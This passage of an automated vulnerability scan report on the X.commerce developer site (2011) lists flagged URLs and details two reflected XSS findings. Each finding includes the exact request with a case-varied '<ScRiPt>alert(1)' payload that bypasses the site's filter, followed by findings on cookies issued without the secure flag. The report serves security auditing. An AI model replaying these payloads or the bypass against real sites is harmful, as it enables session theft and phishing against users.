7.72. https://www.x.com/community/ppx/xspaces/digital_goods

7.73. https://www.x.com/community/ppx/xspaces/finance

7.74. https://www.x.com/community/ppx/xspaces/forums

7.75. https://www.x.com/community/ppx/xspaces/gaming

7.76. https://www.x.com/community/ppx/xspaces/identity

7.77. https://www.x.com/community/ppx/xspaces/innovate

7.78. https://www.x.com/community/ppx/xspaces/introduce

7.79. https://www.x.com/community/ppx/xspaces/mobile

7.80. https://www.x.com/community/ppx/xspaces/mobile/mecl

7.81. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

7.82. https://www.x.com/community/ppx/xspaces/security

7.83. https://www.x.com/community/ppx/xspaces/social

7.84. https://www.x.com/community/ppx/xspaces/subscriptions

7.85. https://www.x.com/community/ppx/xspaces/toolkits

7.86. https://www.x.com/community/ppx/xspaces/web_checkout

7.87. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

7.88. https://www.x.com/community/ppx/xspaces/web_checkout/soap

7.89. https://www.x.com/community/xcommerce-blogs

7.90. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

7.91. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

7.92. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

7.93. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

7.94. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

7.95. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

7.96. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

7.97. https://www.x.com/community/xcommerce-blogs/blog/tags/adobe

7.98. https://www.x.com/community/xcommerce-blogs/blog/tags/andriod

7.99. https://www.x.com/community/xcommerce-blogs/blog/tags/apps

7.100. https://www.x.com/community/xcommerce-blogs/blog/tags/challenge

7.101. https://www.x.com/community/xcommerce-blogs/blog/tags/developer

7.102. https://www.x.com/community/xcommerce-blogs/blog/tags/developer_network

7.103. https://www.x.com/community/xcommerce-blogs/blog/tags/ebay

7.104. https://www.x.com/community/xcommerce-blogs/blog/tags/paypal

7.105. https://www.x.com/community/xcommerce-blogs/blog/tags/winners

7.106. https://www.x.com/community/xcommerce-blogs/blog/tags/x.commerce

7.107. https://www.x.com/community/xcommerce-blogs/blog/tags/xcommerce

7.108. https://www.x.com/doc-publish.jspa

7.109. https://www.x.com/docs/DOC-1031

7.110. https://www.x.com/docs/DOC-1041

7.111. https://www.x.com/docs/DOC-1051

7.112. https://www.x.com/docs/DOC-1106

7.113. https://www.x.com/docs/DOC-1106/delete

7.114. https://www.x.com/docs/DOC-1106/restore

7.115. https://www.x.com/docs/DOC-1108

7.116. https://www.x.com/docs/DOC-1116

7.117. https://www.x.com/docs/DOC-1176

7.118. https://www.x.com/docs/DOC-1204

7.119. https://www.x.com/docs/DOC-1216

7.120. https://www.x.com/docs/DOC-1332

7.121. https://www.x.com/docs/DOC-1372

7.122. https://www.x.com/docs/DOC-1374

7.123. https://www.x.com/docs/DOC-1401

7.124. https://www.x.com/docs/DOC-1431

7.125. https://www.x.com/docs/DOC-1551

7.126. https://www.x.com/docs/DOC-1613

7.127. https://www.x.com/docs/DOC-2241

7.128. https://www.x.com/docs/DOC-2346

7.129. https://www.x.com/docs/DOC-3201

7.130. https://www.x.com/docs/DOC-3212

7.131. https://www.x.com/docs/DOC-3251

7.132. https://www.x.com/docs/DOC-3271

7.133. https://www.x.com/docs/DOC-3321

7.134. https://www.x.com/docs/DOC-3322

7.135. https://www.x.com/docs/DOC-3323

7.136. https://www.x.com/docs/DOC-3345

7.137. https://www.x.com/docs/DOC-3351

7.138. https://www.x.com/docs/DOC-3352

7.139. https://www.x.com/docs/DOC-3353

7.140. https://www.x.com/docs/DOC-3354

7.141. https://www.x.com/docs/DOC-3355

7.142. https://www.x.com/docs/DOC-3371

7.143. https://www.x.com/docs/DOC-3372

7.144. https://www.x.com/docs/DOC-3373

7.145. https://www.x.com/docs/DOC-3374

7.146. https://www.x.com/docs/DOC-3375

7.147. https://www.x.com/docs/DOC-3426

7.148. https://www.x.com/docs/DOC-3427

7.149. https://www.x.com/docs/DOC-3431

7.150. https://www.x.com/docs/DOC-3443

7.151. https://www.x.com/docs/DOC-3444

7.152. https://www.x.com/docs/DOC-3491

7.153. https://www.x.com/docs/DOC-3561

7.154. https://www.x.com/docs/DOC-3562

7.155. https://www.x.com/docs/DOC-3619

7.156. https://www.x.com/docs/DOC-3688

7.157. https://www.x.com/docs/DOC-3811

7.158. https://www.x.com/docs/DOC-3811/delete

7.159. https://www.x.com/docs/DOC-3811/restore

7.160. https://www.x.com/docs/DOC-3812

7.161. https://www.x.com/docs/DOC-3836

7.162. https://www.x.com/docs/DOC-3841

7.163. https://www.x.com/docs/emailPasswordToken!input.jspa

7.164. https://www.x.com/emailPasswordToken!input.jspa

7.165. https://www.x.com/groups/

7.166. https://www.x.com/ideas/

7.167. https://www.x.com/index.jspa

7.168. https://www.x.com/main-apps.jspa

7.169. https://www.x.com/message/186684

7.170. https://www.x.com/message/198017

7.171. https://www.x.com/message/211333

7.172. https://www.x.com/message/211439

7.173. https://www.x.com/message/211738

7.174. https://www.x.com/message/212001

7.175. https://www.x.com/message/212124

7.176. https://www.x.com/message/212170

7.177. https://www.x.com/message/212753

7.178. https://www.x.com/message/212906

7.179. https://www.x.com/message/213354

7.180. https://www.x.com/message/213546

7.181. https://www.x.com/message/213568

7.182. https://www.x.com/message/213571

7.183. https://www.x.com/message/213767

7.184. https://www.x.com/message/213787

7.185. https://www.x.com/message/213788

7.186. https://www.x.com/message/213865

7.187. https://www.x.com/message/214347

7.188. https://www.x.com/message/214440

7.189. https://www.x.com/message/214618

7.190. https://www.x.com/message/214902

7.191. https://www.x.com/message/214926

7.192. https://www.x.com/message/215245

7.193. https://www.x.com/message/215254

7.194. https://www.x.com/message/215264

7.195. https://www.x.com/message/215276

7.196. https://www.x.com/message/215291

7.197. https://www.x.com/people

7.198. https://www.x.com/people/

7.199. https://www.x.com/people/BaldGeek

7.200. https://www.x.com/people/BaldGeek/blog

7.201. https://www.x.com/people/CorinneSherman

7.202. https://www.x.com/people/GiancarloUk2

7.203. https://www.x.com/people/IndieReign

7.204. https://www.x.com/people/JasonVenner

7.205. https://www.x.com/people/MrcheckAPX

7.206. https://www.x.com/people/PP_Igor

7.207. https://www.x.com/people/PP_MTS_Andre

7.208. https://www.x.com/people/PP_MTS_Chad

7.209. https://www.x.com/people/PP_MTS_GuidoT

7.210. https://www.x.com/people/PP_MTS_Magarvin

7.211. https://www.x.com/people/PP_MTS_Patrick

7.212. https://www.x.com/people/PayPalXadmin

7.213. https://www.x.com/people/PayPal_Carolyn

7.214. https://www.x.com/people/PayPal_Sudha

7.215. https://www.x.com/people/PayPal_ToddS

7.216. https://www.x.com/people/Praveen

7.217. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

7.218. https://www.x.com/people/RightWayMail

7.219. https://www.x.com/people/S.Aijaz

7.220. https://www.x.com/people/SRS

7.221. https://www.x.com/people/Saleem

7.222. https://www.x.com/people/Shade8934

7.223. https://www.x.com/people/Suneetha

7.224. https://www.x.com/people/admin

7.225. https://www.x.com/people/amypiazza00

7.226. https://www.x.com/people/angelleye

7.227. https://www.x.com/people/billday

7.228. https://www.x.com/people/blingnation2010

7.229. https://www.x.com/people/bryngregory

7.230. https://www.x.com/people/das_licht

7.231. https://www.x.com/people/dchankhour

7.232. https://www.x.com/people/eferreira

7.233. https://www.x.com/people/emailPasswordToken!input.jspa

7.234. https://www.x.com/people/encore

7.235. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

7.236. https://www.x.com/people/gazugafan

7.237. https://www.x.com/people/gem

7.238. https://www.x.com/people/gogoeric

7.239. https://www.x.com/people/hotellina

7.240. https://www.x.com/people/iConcessionStand

7.241. https://www.x.com/people/joncas

7.242. https://www.x.com/people/lwhite2104

7.243. https://www.x.com/people/mandeheritage

7.244. https://www.x.com/people/odeskdev

7.245. https://www.x.com/people/omuleanu

7.246. https://www.x.com/people/pluto26

7.247. https://www.x.com/people/posiden5665

7.248. https://www.x.com/people/ramonmorales123

7.249. https://www.x.com/people/rizkygarut

7.250. https://www.x.com/people/roguereptile

7.251. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

7.252. https://www.x.com/people/sebastian.kopp@wooga.com

7.253. https://www.x.com/people/skier

7.254. https://www.x.com/projects/

7.255. https://www.x.com/search.jspa

7.256. https://www.x.com/tags

7.257. https://www.x.com/tags/

7.258. https://www.x.com/threads

8. Email addresses disclosed

8.1. https://www.x.com/community/feeds/blogs

8.2. https://www.x.com/community/feeds/documents

8.3. https://www.x.com/community/feeds/messages

8.4. https://www.x.com/community/feeds/popularthreads

8.5. https://www.x.com/community/feeds/unansweredthreads

8.6. https://www.x.com/community/ppx/businesspayments

8.7. https://www.x.com/community/ppx/devchallenge

8.8. https://www.x.com/community/ppx/devchallenge/

8.9. https://www.x.com/community/ppx/devtalk

8.10. https://www.x.com/community/ppx/devzone

8.11. https://www.x.com/community/ppx/global/uk

8.12. https://www.x.com/docs/DOC-1106

8.13. https://www.x.com/docs/DOC-1106.pdf

8.14. https://www.x.com/docs/DOC-1431

8.15. https://www.x.com/docs/DOC-1551

8.16. https://www.x.com/docs/DOC-1613

8.17. https://www.x.com/docs/DOC-2241

8.18. https://www.x.com/message/198017

8.19. https://www.x.com/message/212753

8.20. https://www.x.com/message/213865

8.21. https://www.x.com/message/214902

8.22. https://www.x.com/message/215254

8.23. https://www.x.com/message/215291

8.24. https://www.x.com/people/BaldGeek

8.25. https://www.x.com/people/BaldGeek.vcf

8.26. https://www.x.com/people/CorinneSherman

8.27. https://www.x.com/people/PayPal_Sudha

8.28. https://www.x.com/people/angelleye

8.29. https://www.x.com/people/encore

8.30. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

8.31. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

8.32. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

8.33. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

8.34. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

8.35. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

8.36. https://www.x.com/themes/paypal/js/custom.js

9. Social security numbers disclosed

10. Credit card numbers disclosed

10.1. https://www.x.com/community/feeds/documents

10.2. https://www.x.com/docs/DOC-2241

11. Cacheable HTTPS response

11.1. https://www.x.com/dwr/interface/Clearvote.js

11.2. https://www.x.com/ideas/

11.3. https://www.x.com/opensearch.xml

11.4. https://www.x.com/people

11.5. https://www.x.com/people/

11.6. https://www.x.com/people/BaldGeek

11.7. https://www.x.com/people/BaldGeek.vcf

11.8. https://www.x.com/people/BaldGeek/blog

11.9. https://www.x.com/people/CorinneSherman

11.10. https://www.x.com/people/GiancarloUk2

11.11. https://www.x.com/people/IndieReign

11.12. https://www.x.com/people/JasonVenner

11.13. https://www.x.com/people/MrcheckAPX

11.14. https://www.x.com/people/PP_Igor

11.15. https://www.x.com/people/PP_MTS_Andre

11.16. https://www.x.com/people/PP_MTS_Chad

11.17. https://www.x.com/people/PP_MTS_GuidoT

11.18. https://www.x.com/people/PP_MTS_Magarvin

11.19. https://www.x.com/people/PP_MTS_Patrick

11.20. https://www.x.com/people/PayPalXadmin

11.21. https://www.x.com/people/PayPal_Carolyn

11.22. https://www.x.com/people/PayPal_Sudha

11.23. https://www.x.com/people/PayPal_ToddS

11.24. https://www.x.com/people/Praveen

11.25. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

11.26. https://www.x.com/people/RightWayMail

11.27. https://www.x.com/people/S.Aijaz

11.28. https://www.x.com/people/SRS

11.29. https://www.x.com/people/Saleem

11.30. https://www.x.com/people/Shade8934

11.31. https://www.x.com/people/Suneetha

11.32. https://www.x.com/people/admin

11.33. https://www.x.com/people/amypiazza00

11.34. https://www.x.com/people/angelleye

11.35. https://www.x.com/people/billday

11.36. https://www.x.com/people/blingnation2010

11.37. https://www.x.com/people/bryngregory

11.38. https://www.x.com/people/das_licht

11.39. https://www.x.com/people/dchankhour

11.40. https://www.x.com/people/eferreira

11.41. https://www.x.com/people/encore

11.42. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

11.43. https://www.x.com/people/gazugafan

11.44. https://www.x.com/people/gem

11.45. https://www.x.com/people/gogoeric

11.46. https://www.x.com/people/hotellina

11.47. https://www.x.com/people/iConcessionStand

11.48. https://www.x.com/people/joncas

11.49. https://www.x.com/people/lwhite2104

11.50. https://www.x.com/people/mandeheritage

11.51. https://www.x.com/people/odeskdev

11.52. https://www.x.com/people/omuleanu

11.53. https://www.x.com/people/pluto26

11.54. https://www.x.com/people/posiden5665

11.55. https://www.x.com/people/ramonmorales123

11.56. https://www.x.com/people/rizkygarut

11.57. https://www.x.com/people/roguereptile

11.58. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

11.59. https://www.x.com/people/sebastian.kopp@wooga.com

11.60. https://www.x.com/people/skier

11.61. https://www.x.com/resources/scripts/fancyzoom/images/

11.62. https://www.x.com/resources/scripts/tiny_mce3

11.63. https://www.x.com/servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf

11.64. https://www.x.com/servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf

11.65. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

11.66. https://www.x.com/tags

11.67. https://www.x.com/themes/paypal/images/favicon.ico

11.68. https://www.x.com/threads

12. HTML does not specify charset

12.1. https://www.x.com/dwr/interface

12.2. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

13. Content type incorrectly stated

13.1. https://www.x.com/dwr/interface/Clearvote.js

13.2. https://www.x.com/opensearch.xml

13.3. https://www.x.com/view-video-short.jspa

14. SSL certificate



1. Cross-site scripting (reflected)
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.x.com/blogs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /blogs/?cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6=1 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=254072 t=1313157109864597
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="/main-blogposts.jspa?cc106"><ScRiPt>alert(1)</ScRiPt>180668780e6=1&amp;start=0"
class="jive-pagination-current" >
...[SNIP]...

1.2. https://www.x.com/community/ppx/xspaces/introduce [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /community/ppx/xspaces/introduce?c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed=1 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323032343b31342c323032333b31342c323036343b31342c323033343b31342c323032353b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=269298 t=1313157066395842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="/community/ppx/xspaces/introduce?c05d5"><ScRiPt>alert(1)</ScRiPt>8ef9c8977ed=1&amp;start=0"
class="jive-pagination-current" >
...[SNIP]...

2. SSL cookie without secure flag set
There are 222 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.x.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 12 Aug 2011 01:59:23 GMT
Server: Apache-Coyote/1.1
Location: https://www.x.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; Path=/
Set-Cookie: jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; Version=1; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=1446 t=1313114363172657
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: NSC_xxx.y.dpn-443=44ed4e27151d;path=/


2.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/josh/2011/03/29/paypal-integration-resources

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/josh/2011/03/29/paypal-integration-resources HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=80251 t=1313157101873077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/matt/2010/08/10/retrieving-your-api-credentials

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/matt/2010/08/10/retrieving-your-api-credentials HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=155557 t=1313157101339194
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.4. https://www.x.com/community/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/home HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:30 GMT; Path=/
Vary: User-Agent
JP: D=85622 t=1313157030208430
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.5. https://www.x.com/community/ppx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=86365 t=1313157084689243
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.6. https://www.x.com/community/ppx/adaptive_accounts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_accounts

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_accounts HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031383b31342c323036333b31342c323031373b31342c323031363b31342c323030363b31342c323234363b31342c323031353b31342c323031333b31342c323236393b31342c323232313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=100210 t=1313157059307917
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.7. https://www.x.com/community/ppx/adaptive_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_payments

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
